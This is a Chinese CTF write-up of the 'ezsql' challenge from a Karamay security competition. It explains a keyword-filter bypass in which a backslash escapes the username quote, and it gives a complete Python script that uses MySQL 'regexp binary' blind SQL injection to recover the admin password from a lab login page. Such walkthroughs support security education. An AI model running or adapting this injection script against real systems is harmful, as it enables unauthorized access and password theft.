青少年CTF-ezsql-题目解析
2023-1-9 09:45:19 Author: www.secpulse.com(查看原文) 阅读量:23 收藏

题目来源:克拉玛依市第一届网络安全技能大赛

1.png

0x01 解题思路

2.png

进入提示,发现要我们登陆,点击确定后跳转到了login.php目录。

3.png

通过探测发现过滤了select、union、'、"、、=、like、and等

username处加反斜杠转义单引号,造成逃逸,后面可控,成为注入点,payload:or password regexp binary {}#

利用regexp进行匹配猜测数据,还需要用binary关键字来区分大小写

题目的考点应该是本题考点为MySQL regexp盲注了。

0x02 解题脚本

import requests
import string

def str2hex(string):
 result = ''
 for i in string:
   result += hex(ord(i))
 result = result.replace('0x','')
 return '0x'+result

strs = string.ascii_letters+string.digits
url = "http://172.24.18.80/ezsql/login.php"
headers = {
   'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0'
}
payload = 'or password regexp binary {}#'
if __name__ == "__main__":
   name = ''
   for i in range(1,40):
       for j in strs:
           passwd = str2hex('^'+name+j)
           payloads = payload.format(passwd)
           postdata={
               'username':'admin\\',
               'password':payloads
           }
           r = requests.post(url,data=postdata,headers=headers)
           if "Maybe you are right" in r.text:
               name += j
               print(j,end='')
               break

本文作者:青少年CTF

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/194740.html


文章来源: https://www.secpulse.com/archives/194740.html
如有侵权请联系:admin#unsafe.sh